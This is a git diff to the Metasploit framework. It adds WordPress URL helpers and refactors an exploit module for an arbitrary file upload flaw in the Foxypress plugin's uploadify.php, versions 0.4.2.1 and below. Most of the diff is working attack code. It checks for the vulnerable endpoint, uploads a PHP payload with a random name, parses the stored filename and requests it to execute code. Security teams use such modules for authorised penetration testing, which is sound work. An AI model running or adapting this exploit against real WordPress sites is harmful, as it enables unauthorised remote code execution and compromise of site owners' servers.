diff --git a/lib/msf/http/wordpress/uris.rb b/lib/msf/http/wordpress/uris.rb index 659b419572..1060354113 100644 --- a/lib/msf/http/wordpress/uris.rb +++ b/lib/msf/http/wordpress/uris.rb @@ -80,4 +80,25 @@ module Msf::HTTP::Wordpress::URIs normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php') end + # Returns the Wordpress wp-content dir URL + # + # @return [String] Wordpress wp-content dir URL + def wordpress_url_wp_content + normalize_uri(target_uri.path, wp_content_dir) + end + + # Returns the Wordpress plugins dir URL + # + # @return [String] Wordpress plugins dir URL + def wordpress_url_plugins + normalize_uri(wordpress_url_wp_content, 'plugins') + end + + # Returns the Wordpress themes dir URL + # + # @return [String] Wordpress themes dir URL + def wordpress_url_themes + normalize_uri(wordpress_url_wp_content, 'themes') + end + end diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb index e769b8c993..ac738016b1 100644 --- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb +++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb @@ -8,17 +8,19 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::Remote::HttpClient + include Msf::HTTP::Wordpress + include Msf::Exploit::FileDropper def initialize(info = {}) - super(update_info(info, + super(update_info( + info, 'Name' => 'WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution', - 'Description' => %q{ + 'Description' => %q( This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software plugin known as Foxypress. The vulnerability allows for arbitrary file upload and remote code execution via the uploadify.php script. The Foxypress plug-in versions 0.4.2.1 and below are vulnerable. - }, + ), 'Author' => [ 'Sammy FORGIT', # Vulnerability Discovery, PoC @@ -27,79 +29,56 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - ['EDB', '18991'], - ['OSVDB', '82652'], - ['BID', '53805'], + %w(EDB 18991), + %w(OSVDB 82652), + %w(BID 53805) ], 'Privileged' => false, - 'Payload' => - { - 'Compat' => - { - 'ConnectionType' => 'find', - }, - }, 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Targets' => [[ 'Automatic', { }]], + 'Targets' => [['Foxypress <= 0.4.2.1', {}]], 'DisclosureDate' => 'Jun 05 2012', 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('TARGETURI', [true, "The full URI path to WordPress", "/"]), - ], self.class) end def check - uri = target_uri.path - - res = send_request_cgi({ + res = send_request_cgi( 'method' => 'GET', - 'uri' => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php") - }) + 'uri' => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php') + ) - if res and res.code == 200 - return Exploit::CheckCode::Detected - else - return Exploit::CheckCode::Safe - end + return Exploit::CheckCode::Detected if res && res.code == 200 + + Exploit::CheckCode::Safe end def exploit - - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' - - peer = "#{rhost}:#{rport}" - post_data = Rex::MIME::Message.new - post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") + post_data.add_part("", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") print_status("#{peer} - Sending PHP payload") - res = send_request_cgi({ + res = send_request_cgi( 'method' => 'POST', - 'uri' => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php"), - 'ctype' => 'multipart/form-data; boundary=' + post_data.bound, + 'uri' => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php'), + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s - }) + ) - if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ + if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ print_error("#{peer} - File wasn't uploaded, aborting!") return end - print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...") - res = send_request_cgi({ + filename = "#{Regexp.last_match[1]}.php" + + print_good("#{peer} - Our payload is at: #{filename}. Calling payload...") + register_files_for_cleanup(filename) + res = send_request_cgi( 'method' => 'GET', - 'uri' => normalize_uri(uri, "wp-content/affiliate_images", "#{$1}.php") - }) - - if res and res.code != 200 - print_error("#{peer} - Server returned #{res.code.to_s}") - end + 'uri' => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename) + ) + print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200 end - end